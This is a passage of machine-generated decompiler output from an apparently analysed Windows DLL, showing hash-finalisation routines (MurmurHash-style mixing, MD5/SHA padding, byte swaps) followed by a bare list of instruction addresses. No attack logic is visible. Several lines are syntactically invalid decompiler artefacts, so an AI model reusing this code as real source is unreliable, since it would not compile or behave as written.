								__esi = __eax;
								__edi = __edi + __esp[2];
								__edx = __edi;
								__eax = __edi;
								__edx = 0;
								__esp[3] = 0;
								__eax = __edi >> 1;
								__edx = __ebx;
								__esp[2] = __edi >> 1;
								__eax = __ebx;
								__edx = 0;
								__eax = __ebx >> 1;
								__edx = 0 ^ __ebx;
								__ebx = (0 ^ __ebx) * 0xed558ccd;
								 *__esp = __eax;
								__ecx = 0xed558ccd;
								__edx =  *__esp * 0xff51afd7;
								__eax =  *__esp;
								__ebx = __ebx +  *__esp * 0xff51afd7;
								__edx = __eax * 0xed558ccd >> 0x20;
								__eax = __eax * 0xed558ccd;
								__edx = __edx + __ebx;
								__ebx = __edx;
								__ecx = __edx;
								__ebx = 0;
								__edx >> 1 = __edx >> 0x00000001 ^ __eax;
								__ebx = 0 ^ __edx;
								 *__esp = __edx >> 0x00000001 ^ __eax;
								__edx = __ebx;
								__eax =  *__esp * 0xc4ceb9fe;
								__esp[1] = __ebx;
								__ebx = __ebx * 0x1a85ec53;
								__ebx = __ebx +  *__esp * 0xc4ceb9fe;
								__eax =  *__esp;
								__edx = __eax * 0x1a85ec53 >> 0x20;
								__eax = __eax * 0x1a85ec53;
								__edx = __edx + __ebx;
								__ebx = 0;
								__ecx = __edx;
								__edx = __edx ^ 0;
								__ebx = __esp[3];
								__eax = __eax ^ __ecx;
								__ecx = __esp[2];
								__ebx = __edi;
								__edi = __esp[0xd];
								__esi = __esi ^ __esp[2];
								__ecx = __esi;
								__ecx = __esi + __eax;
								 *__edi = __ecx;
								asm("adc ebx, edx");
								__ecx = __eax + __ecx;
								 *(__edi + 4) = __ebx;
								asm("adc ebx, edx");
								 *(__edi + 8) = __ecx;
								 *(__edi + 0xc) = __ebx;
								__esp =  &(__esp[7]);
								_pop(__ebx);
								_pop(__esi);
								_pop(__edi);
								_pop(__ebp);
								return __eax;
								goto L457;
							case 0x1e:
								__esp[2] = __ecx;
								__esp[1] = __eax;
								_push(__edi);
								__edi = 1;
								_push(__esi);
								_push(__ebx);
								__esp = __esp - 0x20;
								__esi = __esp[0xc];
								__ebx = __esp[0xd];
								__eax =  *(__esi + 8);
								__edx =  *(__esi + 0xc);
								__esp[2] = 1;
								__edi = __esi + 0x10;
								 *__esp = __esi;
								__edx = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
								__esp[7] = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
								__esp[6] = __eax;
								__eax = 0x100bf9a0;
								__esp[1] = 0x100bf9a0;
								L237();
								__eax =  *(__esi + 8);
								__edx =  *(__esi + 0xc);
								__eax = __eax & 0x0000003f;
								if((__eax & 0x0000003f ^ 0x00000038) != 0) {
									do {
										__ecx = __eax;
										__ecx = __eax & 0x0000003f;
										 *(__esi + 8) = __eax;
										asm("adc edx, 0x0");
										 *(__esi + 0xc) = __edx;
										if(__ecx != 0x3f) {
											 *((char*)(__esi + 0x10 + __ecx)) = 0;
										} else {
											 *((char*)(__esi + 0x4f)) = 0;
											__eax = __esi + 0x50;
											__esp[1] = __edi;
											 *__esp = __esi + 0x50;
											__eax =  *((intOrPtr*)(__esi + 0x78))();
										}
										__eax =  *(__esi + 8);
										__edx =  *(__esi + 0xc);
										__eax = __eax & 0x0000003f;
									} while ((__eax & 0x0000003f ^ 0x00000038) != 0);
								} else {
								}
								 *__esp = __esi;
								__eax = 8;
								__esp[2] = 8;
								__eax =  &(__esp[6]);
								__esp[1] = __eax;
								L237();
								if( *__esi != 0) {
									__eax =  *(__esi + 0x50);
									 *__ebx = __eax;
									if( *__esi > 1) {
										__eax =  *(__esi + 0x54);
										 *(__ebx + 4) = __eax;
										if( *__esi > 2) {
											__eax =  *(__esi + 0x58);
											 *(8 + __ebx) = __eax;
											if( *__esi > 3) {
												__eax =  *(__esi + 0x5c);
												 *(__ebx + 0xc) = __eax;
												if( *__esi > 4) {
													__eax =  *(__esi + 0x60);
													 *(0x10 + __ebx) = __eax;
													if( *__esi > 5) {
														__eax =  *(__esi + 0x64);
														 *(__ebx + 0x14) = __eax;
														if( *__esi > 6) {
															__eax =  *(__esi + 0x68);
															 *(__ebx + 0x18) = __eax;
															if( *__esi > 7) {
																__eax =  *(__esi + 0x6c);
																 *(__ebx + 0x1c) = __eax;
																if( *__esi > 8) {
																	__eax =  *(__esi + 0x70);
																	 *(__ebx + 0x20) = __eax;
																	if( *__esi > 9) {
																		__eax =  *(__esi + 0x74);
																		 *(__ebx + 0x24) = __eax;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
								__esp =  &(__esp[8]);
								_pop(__ebx);
								_pop(__esi);
								_pop(__edi);
								return __eax;
								goto L457;
							case 0x1f:
								__esp[2] = __ecx;
								__esp[1] = __eax;
								_push(__ebp);
								_push(__edi);
								__edi = 1;
								_push(__esi);
								_push(__ebx);
								__esp = __esp - 0x2c;
								__esi = __esp[0x10];
								__ebx = __esp[0x11];
								__eax =  *(__esi + 8);
								__edx =  *(__esi + 0xc);
								__esp[2] = 1;
								__edi = __esi + 0x10;
								 *__esp = __esi;
								__edx = ( *(__esi + 0xc) << 0x00000020 | __eax) << 3;
								__eax = __eax << 3;
								__ebp = __edx;
								__edx = __eax;
								__eax = __ebp;
								__ebp = 0x100bfae0;
								asm("bswap edx");
								asm("bswap eax");
								__esp[1] = 0x100bfae0;
								__esp[6] = __eax;
								__esp[7] = __edx;
								L290();
								__eax =  *(__esi + 8);
								__edx =  *(__esi + 0xc);
								__eax = __eax & 0x0000003f;
								if((__eax & 0x0000003f ^ 0x00000038) != 0) {
									do {
										__ecx = __eax;
										__ecx = __eax & 0x0000003f;
										 *(__esi + 8) = __eax;
										asm("adc edx, 0x0");
										 *(__esi + 0xc) = __edx;
										if(__ecx != 0x3f) {
											 *((char*)(__esi + 0x10 + __ecx)) = 0;
										} else {
											 *((char*)(__esi + 0x4f)) = 0;
											__eax = __esi + 0x50;
											__esp[1] = __edi;
											 *__esp = __esi + 0x50;
											__eax =  *(__esi + 0x70)();
										}
										__eax =  *(__esi + 8);
										__edx =  *(__esi + 0xc);
										__eax = __eax & 0x0000003f;
									} while ((__eax & 0x0000003f ^ 0x00000038) != 0);
								} else {
								}
								 *__esp = __esi;
								__eax = 8;
								__esp[2] = 8;
								__eax =  &(__esp[6]);
								__esp[1] = __eax;
								L290();
								if( *__esi != 0) {
									__eax =  *(__esi + 0x50);
									asm("bswap eax");
									 *__ebx = __eax;
									if( *__esi > 1) {
										__eax =  *(__esi + 0x54);
										asm("bswap eax");
										 *(__ebx + 4) = __eax;
										if( *__esi > 2) {
											__eax =  *(__esi + 0x58);
											asm("bswap eax");
											 *(8 + __ebx) = __eax;
											if( *__esi > 3) {
												__eax =  *(__esi + 0x5c);
												asm("bswap eax");
												 *(__ebx + 0xc) = __eax;
												if( *__esi > 4) {
													__eax =  *(__esi + 0x60);
													asm("bswap eax");
													 *(0x10 + __ebx) = __eax;
													if( *__esi > 5) {
														__eax =  *(__esi + 0x64);
														asm("bswap eax");
														 *(__ebx + 0x14) = __eax;
														if( *__esi > 6) {
															__eax =  *(__esi + 0x68);
															asm("bswap eax");
															 *(__ebx + 0x18) = __eax;
															if( *__esi > 7) {
																__eax =  *(__esi + 0x6c);
																asm("bswap eax");
																 *(__ebx + 0x1c) = __eax;
																if( *__esi > 8) {
																	__eax =  *(__esi + 0x70);
																	asm("bswap eax");
																	 *(__ebx + 0x20) = __eax;
																}
															}
														}
													}
												}
											}
										}
									}
								}
								__esp =  &(__esp[0xb]);
								_pop(__ebx);
								_pop(__esi);
								_pop(__edi);
								_pop(__ebp);
								return __eax;
								goto L457;
							case 0x20:
								__esp[2] = __ecx;
								__esp[1] = __eax;
								_push(__ebp);
								__eax = 0;
								_push(__edi);
								__edx = 0;
								_push(__esi);
								_push(__ebx);
								__esp = __esp - 0x1c;
								__esp[2] = 0;
								__ebx = __esp[0xc];
								__esp[3] = 0;
								__eax =  *(8 + __ebx);
								__edx =  *(__ebx + 0xc);
								__eax = __eax << 3;
								__edi = __edx;
								__edi = (__edx << 0x00000020 | __eax) << 3;
								__ecx = __eax << 3;
								asm("bswap ecx");
								__esp[5] = __eax << 3;
								__ecx = __eax;
								__ecx = __eax & 0x0000007f;
								 *(8 + __ebx) = __eax;
								asm("adc edx, 0x0");
								__esi = __edi;
								asm("bswap esi");
								 *(__ebx + 0xc) = __edx;
								__esp[4] = __edi;
								if(__ecx == 0x7f) {
									 *((char*)(__ebx + 0x8f)) = 0x80;
									__edx = 0x10 + __ebx;
									__esi = 0x100bfae9;
									__ebx + 0x90 = E10041550(__ebx + 0x90, 0x10 + __ebx);
									__edx = 0x10;
									__ecx = 0;
								} else {
									__edx = 0x10 + __ecx;
									__esi = 0x100bfae8;
									__ecx = 1;
								}
								__edx = __edx + __ebx;
								if(__ecx != 0) {
									__eax = 0;
									__edi = __ebx;
									do {
										__ebx =  *(__esi + __eax) & 0x000000ff;
										 *(__eax + __edx) = __bl;
										__eax = __eax + 1;
									} while (__eax < __ecx);
									__ebx = __edi;
								}
								__esi =  *(8 + __ebx);
								__edi =  *(__ebx + 0xc);
								__esi = __esi & 0x0000007f;
								if((__esi & 0x0000007f ^ 0x00000070) != 0) {
									__ebp = 0x10 + __ebx;
									while(1) {
										L386:
										__eax = __esi;
										__eax = __esi & 0x0000007f;
										__esi = __esi + 1;
										 *(8 + __ebx) = __esi;
										asm("adc edi, 0x0");
										 *(__ebx + 0xc) = __edi;
										if(__eax == 0x7f) {
											break;
										}
										 *((char*)(__ebx + __eax + 0x10)) = 0;
										__esi =  *(8 + __ebx);
										__edi =  *(__ebx + 0xc);
										__esi = __esi & 0x0000007f;
										if((__esi & 0x0000007f ^ 0x00000070) != 0) {
											continue;
										}
										goto L388;
									}
									 *((char*)(__ebx + 0x8f)) = 0;
									__eax = __ebx + 0x90;
									__edx = __ebp;
									E10041550(__ebx + 0x90, __ebp) = __esi;
									__esi & 0x0000007f = __esi & 0x0000007f ^ 0x00000070;
									__eax = __esi & 0x0000007f ^ 0x00000070;
									if((__esi & 0x0000007f ^ 0x00000070) != 0) {
										goto L386;
									}
								}
								L388:
								__ebp = __esi;
								__ebp = __esi & 0x0000007f;
								 *(8 + __ebx) = __esi;
								__esi = 0x80;
								asm("adc edi, 0x0");
								 *(__ebx + 0xc) = __edi;
								__edx = 0x10 + __ebp;
								__esi = 0x80 - __ebp;
								if(0x80 <= 8) {
									__edx = __edx + __ebx;
									__ecx =  &(__esp[2]);
									__edi = 0x80;
									if(0x80 >= 4) {
										if((__dl & 0x00000001) != 0) {
											__eax = __esp[2] & 0x000000ff;
											__ecx =  &(__esp[2]);
											__edx = __edx + 1;
											_t1169 = __esi - 1; // 0x7f
											__edi = _t1169;
											 *(__edx - 1) = __al;
										}
										if((__dl & 0x00000002) != 0) {
											__eax =  *__ecx & 0x0000ffff;
											__edx = __edx + 2;
											__ecx = __ecx + 2;
											__edi = __edi - 2;
											 *(__edx - 2) = __ax;
										}
										if(__edi >= 4) {
											__esp[1] = __ebp;
											__eax = __edi;
											__esp[0xc] = __ebx;
											__eax = __edi & 0xfffffffc;
											 *__esp = __edi & 0xfffffffc;
											__eax = 0;
											__ebp =  *__esp;
											do {
												__ebx =  *(__eax + __ecx);
												 *(__eax + __edx) =  *(__eax + __ecx);
												__eax = __eax + 4;
											} while (__eax < __ebp);
											__ebp = __esp[1];
											__edx = __eax + __edx;
											__ecx = __eax + __ecx;
											__ebx = __esp[0xc];
										}
									}
									__eax = 0;
									if((__edi & 0x00000002) != 0) {
										__eax =  *__ecx & 0x0000ffff;
										__edi = __edi & 0x00000001;
										 *__edx = __ax;
										__eax = 2;
										if(__edi != 0) {
											goto L431;
										}
									} else {
										if(__edi != 0) {
											L431:
											__ecx =  *(__eax + __ecx) & 0x000000ff;
											 *(__eax + __edx) = __cl;
										}
									}
									__edx = 0x10 + __ebx;
									__ebp = __ebp - 0x78;
									__ebx + 0x90 = E10041550(__ebx + 0x90, 0x10 + __ebx);
									_t1129 = __esi + 8; // 0x88
									__eax = _t1129;
									__edx = 0x10;
									__eax = _t1129 + __esp;
								} else {
									__eax =  &(__esp[2]);
									__ebp = 8;
								}
								__ecx = __ebx + __edx;
								if(__ebp >= 4) {
									if((__cl & 0x00000001) != 0) {
										__edx =  *__eax & 0x000000ff;
										__ecx = __ecx + 1;
										__eax = __eax + 1;
										__ebp = __ebp - 1;
										 *(__ecx - 1) = __dl;
									}
									if((__cl & 0x00000002) != 0) {
										__edx =  *__eax & 0x0000ffff;
										__ecx = __ecx + 2;
										__eax = __eax + 2;
										__ebp = __ebp - 2;
										 *(__ecx - 2) = __dx;
									}
									if(__ebp >= 4) {
										__esi = __ebp;
										__edx = 0;
										__esi = __ebp & 0xfffffffc;
										do {
											__edi =  *(__eax + __edx);
											 *(__ecx + __edx) =  *(__eax + __edx);
											__edx = __edx + 4;
										} while (__edx < __esi);
										__ecx = __ecx + __edx;
										__eax = __eax + __edx;
									}
								}
								__edx = 0;
								if((__ebp & 0x00000002) != 0) {
									__edx =  *__eax & 0x0000ffff;
									__ebp = __ebp & 0x00000001;
									 *__ecx = __dx;
									__edx = 2;
									if(__ebp == 0) {
										goto L393;
									} else {
										goto L407;
									}
									L403:
									__esp =  &(__esp[7]);
									_pop(__ebx);
									_pop(__esi);
									_pop(__edi);
									_pop(__ebp);
									return __eax;
									goto L457;
								} else {
									if(__ebp != 0) {
										L407:
										__eax =  *(__eax + __edx) & 0x000000ff;
										 *(__ecx + __edx) = __al;
									}
								}
								L393:
								__eax =  *(8 + __ebx);
								__edi = 0x80;
								__edx =  *(__ebx + 0xc);
								__esi = __eax;
								__esi = __eax & 0x0000007f;
								 *(8 + __ebx) = __eax;
								asm("adc edx, 0x0");
								__edi = 0x80 - __esi;
								if(0x80 <= 8) {
									__ebp = 0x80;
									__edx = __esi + 0x10 + __ebx;
									__ecx =  &(__esp[4]);
									if(0x80 >= 4) {
										if((__dl & 0x00000001) != 0) {
											__eax = __esp[4] & 0x000000ff;
											__ecx =  &(__esp[4]);
											__edx = __edx + 1;
											_t1163 = __edi - 1; // 0x7f
											__ebp = _t1163;
											 *(__edx - 1) = __al;
										}
										if((__dl & 0x00000002) != 0) {
											__eax =  *__ecx & 0x0000ffff;
											__edx = __edx + 2;
											__ecx = __ecx + 2;
											__ebp = __ebp - 2;
											 *(__edx - 2) = __ax;
										}
										if(__ebp >= 4) {
											__esp[1] = __esi;
											__eax = __ebp;
											__esp[0xc] = __ebx;
											__eax = __ebp & 0xfffffffc;
											 *__esp = __ebp & 0xfffffffc;
											__eax = 0;
											__esi =  *__esp;
											do {
												__ebx =  *(__eax + __ecx);
												 *(__eax + __edx) =  *(__eax + __ecx);
												__eax = __eax + 4;
											} while (__eax < __esi);
											__esi = __esp[1];
											__edx = __eax + __edx;
											__ecx = __eax + __ecx;
											__ebx = __esp[0xc];
										}
									}
									__eax = 0;
									if((__ebp & 0x00000002) != 0) {
										__eax =  *__ecx & 0x0000ffff;
										__ebp = __ebp & 0x00000001;
										 *__edx = __ax;
										__eax = 2;
										if(__ebp != 0) {
											goto L434;
										}
									} else {
										if(__ebp != 0) {
											L434:
											__ecx =  *(__eax + __ecx) & 0x000000ff;
											 *(__eax + __edx) = __cl;
										}
									}
									__edx = 0x10 + __ebx;
									__ebx + 0x90 = E10041550(__ebx + 0x90, 0x10 + __ebx);
									__eax =  &(__esp[4]);
									__edx =  &(__esp[4]) + __edi;
									__eax = __esi - 0x78;
									__esi = 0x10;
								} else {
									__esi = __esi + 0x10;
									__eax = 8;
									__edx =  &(__esp[4]);
								}
								__esi = __esi + __ebx;
								if(__eax >= 4) {
									if((__esi & 0x00000001) != 0) {
										__ecx =  *__edx & 0x000000ff;
										__esi = __esi + 1;
										__edx = __edx + 1;
										__eax = __eax - 1;
										 *(__esi - 1) = __cl;
									}
									if((__esi & 0x00000002) != 0) {
										__edi =  *__edx & 0x0000ffff;
										__esi = __esi + 2;
										__edx = __edx + 2;
										__eax = __eax - 2;
										 *(__esi - 2) = __di;
									}
									if(__eax >= 4) {
										__edi = __eax;
										__ecx = 0;
										__edi = __eax & 0xfffffffc;
										do {
											__ebp =  *(__edx + __ecx);
											 *(__esi + __ecx) =  *(__edx + __ecx);
											__ecx = __ecx + 4;
										} while (__ecx < __edi);
										__esi = __esi + __ecx;
										__edx = __edx + __ecx;
									}
								}
								__ecx = 0;
								if((__al & 0x00000002) != 0) {
									__edi =  *__edx & 0x0000ffff;
									__ecx = 2;
									 *__esi = __di;
									if((__al & 0x00000001) == 0) {
										goto L398;
									} else {
										goto L404;
									}
									goto L457;
								} else {
									if((__al & 0x00000001) != 0) {
										L404:
										__eax =  *(__edx + __ecx) & 0x000000ff;
										 *(__esi + __ecx) = __al;
									}
								}
								L398:
								__edi = 0;
								__ebp = 0;
								if( *__ebx != 0) {
									__edx = 0;
									__ebp = __esp[0xd];
									__eax = 0;
									do {
										__esi =  *(__ebx + 0x90 + __eax * 8);
										__edi =  *(__ebx + 0x94 + __eax * 8);
										asm("bswap esi");
										 *(__ebp + 4 + __eax * 8) =  *(__ebx + 0x90 + __eax * 8);
										asm("bswap edi");
										 *(__ebp + __eax * 8) =  *(__ebx + 0x94 + __eax * 8);
										__eax = __eax + 1;
										__ecx =  *__ebx & 0x000000ff;
										asm("adc edx, 0x0");
										__edi = 0;
										 *__esp = __cl;
										__ecx = 0;
										asm("sbb ecx, edi");
									} while (__eax < ( *__ebx & 0x000000ff));
									__esp[2] = __eax;
									__ecx =  *__esp & 0x000000ff;
									__esp[3] = 0;
									if(__cl != 0) {
										_t1089 = __eax + 0x12; // 0x11
										__edx = _t1089;
										__edi = __esp[0xd];
										__ecx =  *(__ebx + 4 + _t1089 * 8);
										__edx = __ecx;
										__ebx = __ch & 0x000000ff;
										__edx = __ecx << 8;
										__edx = __ecx << 0x00000008 | __ch & 0x000000ff;
										__ebx = __ecx;
										__ebx = __ecx >> 8;
										__ecx = __ecx >> 0x18;
										__ebx = __ebx & 0x0000ff00;
										__edx = __edx << 0x10;
										 *(__esp[0xd] + __eax * 8) = __edx;
									}
								}
								goto L403;
							case 0x21:
								__eax =  *(__eax + 0xc);
								__eax =  !__eax;
								asm("bswap eax");
								 *__ecx = __eax;
								return __eax;
								goto L457;
							case 0x22:
								__eax =  *(__eax + 0xc);
								asm("bswap eax");
								 *__ecx = __eax;
								return __eax;
								goto L457;
							case 0x23:
								__esi =  &(__esp[4]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L131();
								goto L50;
							case 0x24:
								__esi =  &(__esp[4]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L222();
								goto L50;
							case 0x25:
								__esi =  &(__esp[4]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L272();
								__ecx = __ebp;
								__ecx =  <=  ? __ebx : __ebp;
								__edi = __esp[0x1d];
								if(__ecx < 8) {
									goto L51;
								} else {
									goto L55;
								}
								goto L457;
							case 0x26:
								__esi =  &(__esp[4]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L325();
								goto L50;
							case 0x27:
								__esi =  &(__esp[4]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L377();
								goto L50;
							case 0x28:
								__eax =  *(__edx + 0xc);
								__esi =  &(__esp[4]);
								__eax =  !( *(__edx + 0xc));
								asm("bswap eax");
								__esp[4] =  !( *(__edx + 0xc));
								goto L50;
							case 0x29:
								__eax =  *(__edx + 0xc);
								asm("bswap eax");
								__esp[4] =  *(__edx + 0xc);
								__esi =  &(__esp[4]);
								L50:
								__ecx = __ebp;
								__edi = __esp[0x1d];
								__ecx =  <=  ? __ebx : __ebp;
								if(__ecx >= 8) {
									L55:
									if((__edi & 0x00000001) != 0) {
										__eax = __esp[4] & 0x000000ff;
										__esi =  &(__esp[4]);
										__ecx = __ecx - 1;
										 *__edi = __al;
										__eax = __esp[0x1d];
										__edi = __esp[0x1d] + 1;
									}
									if((__edi & 0x00000002) != 0) {
										__eax =  *__esi & 0x0000ffff;
										__edi = __edi + 2;
										__esi = __esi + 2;
										__ecx = __ecx - 2;
										 *(__edi - 2) = __ax;
									}
									if((__edi & 0x00000004) != 0) {
										__eax =  *__esi;
										__edi = __edi + 4;
										__esi = __esi + 4;
										__ecx = __ecx - 4;
										 *(__edi - 4) = __eax;
									}
								}
								L51:
								__eax = memcpy(__edi, __esi, __ecx);
								__esi + __ecx = __esi + __ecx + __ecx;
								__ecx = 0;
								if(__ebp < __ebx) {
									__eax = __esp[0x1d];
									__ebx = __ebx - __ebp;
									__edi = __eax + __ebp;
									if(__ebx >= 8) {
										if((__edi & 0x00000001) != 0) {
											 *__edi = 0;
											__ebx = __ebx - 1;
											__edi = __edi + 1;
										}
										if((__edi & 0x00000002) != 0) {
											 *__edi = 0;
											__ebx = __ebx - 2;
											__edi = __edi + 2;
										}
										if((__edi & 0x00000004) != 0) {
											 *__edi = 0;
											__ebx = __ebx - 4;
											__edi = __edi + 4;
										}
										__ecx = __ebx;
										__eax = 0;
										__ecx = __ebx >> 2;
										__ebx = __ebx & 0x00000003;
										__eax = memset(__edi, 0, __ecx << 2);
										__edi = __edi + __ecx;
										__ecx = 0;
									}
									if((__bl & 0x00000004) != 0) {
										 *__edi = 0;
										__edi = __edi + 4;
									}
									if((__bl & 0x00000002) != 0) {
										 *__edi = 0;
										__edi = __edi + 2;
									}
									if((__bl & 0x00000001) != 0) {
										 *__edi = 0;
									}
								}
								__ebx = __esp[0x17];
								__esi = __esp[0x18];
								__edi = __esp[0x19];
								__ebp = __esp[0x1a];
								__esp =  &(__esp[0x1b]);
								return __eax;
								goto L457;
							case 0x2a:
								__esi =  &(__esp[5]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L131();
								goto L81;
							case 0x2b:
								__esi =  &(__esp[5]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L222();
								goto L81;
							case 0x2c:
								__esi =  &(__esp[5]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L272();
								goto L81;
							case 0x2d:
								__esi =  &(__esp[5]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L325();
								goto L81;
							case 0x2e:
								__esi =  &(__esp[5]);
								__esp[1] = __esi;
								__eax =  *__edx;
								 *__esp =  *__edx;
								L377();
								goto L81;
							case 0x2f:
								__eax =  *(__edx + 0xc);
								__esi =  &(__esp[5]);
								__eax =  !( *(__edx + 0xc));
								asm("bswap eax");
								__esp[5] =  !( *(__edx + 0xc));
								goto L81;
							case 0x30:
								__eax =  *(__edx + 0xc);
								asm("bswap eax");
								__esp[5] =  *(__edx + 0xc);
								__esi =  &(__esp[5]);
								L81:
								__esp[2] = __esi;
								__esi =  &(__esp[0x15]);
								__eax = 0x59;
								__esp[3] = __edi;
								__esp[1] = 0x59;
								 *__esp = __esi;
								__eax = L100078D0();
								__edx = __edi + 2;
								__eax = 0xaaaaaaab;
								_t125 = 0xaaaaaaab * __edx;
								__edx = 0xaaaaaaab * __edx >> 0x20;
								__eax = _t125;
								__edi = __ebp;
								__eax = 1 + __edx * 4;
								__ecx = __eax;
								__ecx =  <=  ? __ebx : __eax;
								if(__ecx >= 8) {
									if((__ebp & 0x00000001) != 0) {
										__edx = __esp[0x15] & 0x000000ff;
										__edi = __ebp + 1;
										__ecx = __ecx - 1;
										__esi =  &(__esp[0x16]);
										 *__ebp = __dl;
									}
									if((__edi & 0x00000002) != 0) {
										__edx =  *__esi & 0x0000ffff;
										__edi = __edi + 2;
										__esi = __esi + 2;
										__ecx = __ecx - 2;
										 *(__edi - 2) = __dx;
									}
									if((__edi & 0x00000004) != 0) {
										__edx =  *__esi;
										__edi = __edi + 4;
										__esi = __esi + 4;
										__ecx = __ecx - 4;
										 *(__edi - 4) = __edx;
									}
								}
								__eax = memcpy(__edi, __esi, __ecx);
								__esi + __ecx = __esi + __ecx + __ecx;
								__ecx = 0;
								if(__ebx < __eax) {
									 *((char*)(__ebp + __ebx - 1)) = 0;
								}
								__ebx = __esp[0x2f];
								__esi = __esp[0x30];
								__edi = __esp[0x31];
								__ebp = __esp[0x32];
								__esp =  &(__esp[0x33]);
								return __eax;
								goto L457;
						}
					}
				}
				goto L457;
			}

0x1001c791
0x1001c799
0x1001c79b
0x1001c79e
0x1001c7a2
0x1001c7a6
0x1001c7b7
0x1001c7b7
0x1001c7bb
0x1001c7be
0x1001c7c5
0x1001c7c7
0x00000000
0x00000000
0x1001c7c9
0x1001c7cd
0x1001c7b0
0x00000000
0x1001c7cf
0x1001c7dd
0x1001c7dd
0x00000000
0x1001c7cd
0x1001c7e0
0x1001c7e7
0x1001c7ee
0x1001c7f0
0x1001c865
0x1001c865
0x00000000
0x1001c7f2
0x1001c7f2
0x1001c7f8
0x1001c813
0x1001c813
0x00000000
0x1001c7fa
0x1001c7fa
0x00000000
0x1001c848
0x00000000
0x00000000
0x1001c852
0x00000000
0x00000000
0x1001c820
0x00000000
0x00000000
0x1001c830
0x00000000
0x00000000
0x1001c808
0x1001c80d
0x1001c80d
0x1001c811
0x1001c859
0x1001c860
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c816
0x1001c81f
0x00000000
0x00000000
0x1001c843
0x00000000
0x00000000
0x1001c8b2
0x1001c8b6
0x100287b0
0x100287b4
0x100287ba
0x100287c1
0x100287c8
0x100287cf
0x100287d6
0x100287dd
0x00000000
0x00000000
0x1001c8c2
0x1001c8c6
0x1002a0d0
0x1002a0d3
0x1002a0d7
0x1002a0db
0x1002a0dd
0x1002a0e0
0x1002a0e5
0x1002a0e9
0x1002a0ef
0x1002a190
0x1002a194
0x1002a197
0x1002a197
0x1002a0f7
0x1002a180
0x1002a185
0x1002a188
0x1002a188
0x1002a0fd
0x1002a0ff
0x1002a101
0x1002a104
0x1002a104
0x1002a107
0x1002a10b
0x1002a10e
0x1002a112
0x1002a117
0x1002a170
0x1002a176
0x1002a17c
0x00000000
0x1002a17e
0x00000000
0x1002a17e
0x1002a119
0x1002a11c
0x1002a158
0x1002a158
0x1002a15d
0x1002a163
0x00000000
0x1002a165
0x1002a11e
0x1002a11e
0x1002a121
0x1002a150
0x1002a150
0x1002a150
0x1002a121
0x1002a11c
0x1002a123
0x1002a126
0x1002a12d
0x1002a131
0x1002a138
0x1002a13c
0x1002a142
0x1002a149
0x1002a14c
0x00000000
0x00000000
0x1001c8d0
0x1001c8d5
0x1001c8db
0x1001c8de
0x00000000
0x00000000
0x1001c8e8
0x1001c8ed
0x1001c8f3
0x1001c8f6
0x00000000
0x00000000
0x1001c900
0x1001c905
0x1001c90b
0x1001c90e
0x00000000
0x00000000
0x1001c918
0x1001c91d
0x1001c923
0x1001c926
0x00000000
0x00000000
0x1001c930
0x1001c935
0x1001c93b
0x1001c93e
0x00000000
0x00000000
0x1001c950
0x1001c955
0x1001c95b
0x1001c95e
0x00000000
0x00000000
0x1001c970
0x1001c975
0x1001c97b
0x1001c97e
0x00000000
0x00000000
0x1001c990
0x1001c995
0x1001c99b
0x1001c99e
0x00000000
0x00000000
0x1001c9b0
0x1001c9b5
0x1001c9bb
0x1001c9be
0x00000000
0x00000000
0x1001c9d0
0x1001c9d5
0x1001c9db
0x1001c9de
0x00000000
0x00000000
0x1001c9f0
0x1001c9f5
0x1001c9fb
0x1001c9fe
0x00000000
0x00000000
0x1001c8a0
0x00000000
0x00000000
0x1001c890
0x1001c897
0x1001c897
0x1001c89a
0x00000000
0x00000000
0x1001cae8
0x1001caec
0x1001caf0
0x1001caf2
0x1001caf6
0x1001cafa
0x100287e0
0x100287e3
0x100287e7
0x100287eb
0x100287ef
0x100287f3
0x100287f7
0x100287fb
0x100287fd
0x100287ff
0x10028804
0x10028806
0x10028808
0x1002880a
0x1002880d
0x10028810
0x10028813
0x10028878
0x1002887d
0x1002887f
0x10028883
0x10028887
0x10028889
0x1002888e
0x10028892
0x10028895
0x1002889c
0x10028956
0x100289b0
0x100289b3
0x100289b4
0x100289b7
0x100289bb
0x100289be
0x100289be
0x100289c1
0x100289c1
0x1002895e
0x10028998
0x1002899b
0x1002899e
0x100289a1
0x100289a5
0x100289a5
0x10028960
0x10028967
0x1002896d
0x10028971
0x10028974
0x10028976
0x10028978
0x10028978
0x1002897b
0x1002897e
0x10028981
0x10028985
0x10028989
0x1002898b
0x1002898b
0x10028967
0x100288a2
0x100288a9
0x100288ab
0x100288ae
0x100288b3
0x100288b3
0x100288bb
0x100288bd
0x100288c1
0x100288c1
0x100288c4
0x100288c7
0x100288cc
0x100288d2
0x100288d6
0x100288d8
0x100288dc
0x100288df
0x100288e4
0x100288e7
0x100288ec
0x00000000
0x100288ec
0x10028815
0x10028815
0x10028818
0x10028818
0x1002881c
0x1002881e
0x10028826
0x10028828
0x1002882b
0x10028848
0x1002884c
0x10028855
0x10028858
0x10028913
0x100289dc
0x100289df
0x100289e0
0x100289e1
0x100289e4
0x100289e4
0x10028920
0x100289c7
0x100289ca
0x100289cd
0x100289d0
0x100289d3
0x100289d3
0x10028929
0x1002892f
0x10028931
0x10028933
0x10028936
0x10028936
0x10028939
0x1002893c
0x1002893f
0x10028943
0x10028945
0x10028945
0x10028929
0x1002885e
0x10028862
0x100288f8
0x100288fd
0x10028902
0x10028905
0x00000000
0x1002890b
0x10028868
0x1002886a
0x1002886c
0x1002886c
0x10028870
0x10028870
0x1002886a
0x10028862
0x1002882b
0x1002882d
0x10028831
0x10028835
0x10028839
0x1002883d
0x10028840
0x00000000
0x00000000
0x1001cb08
0x1001cb0c
0x1001cb10
0x1001cb12
0x1001cb16
0x1001cb1a
0x1002a1b0
0x1002a1b1
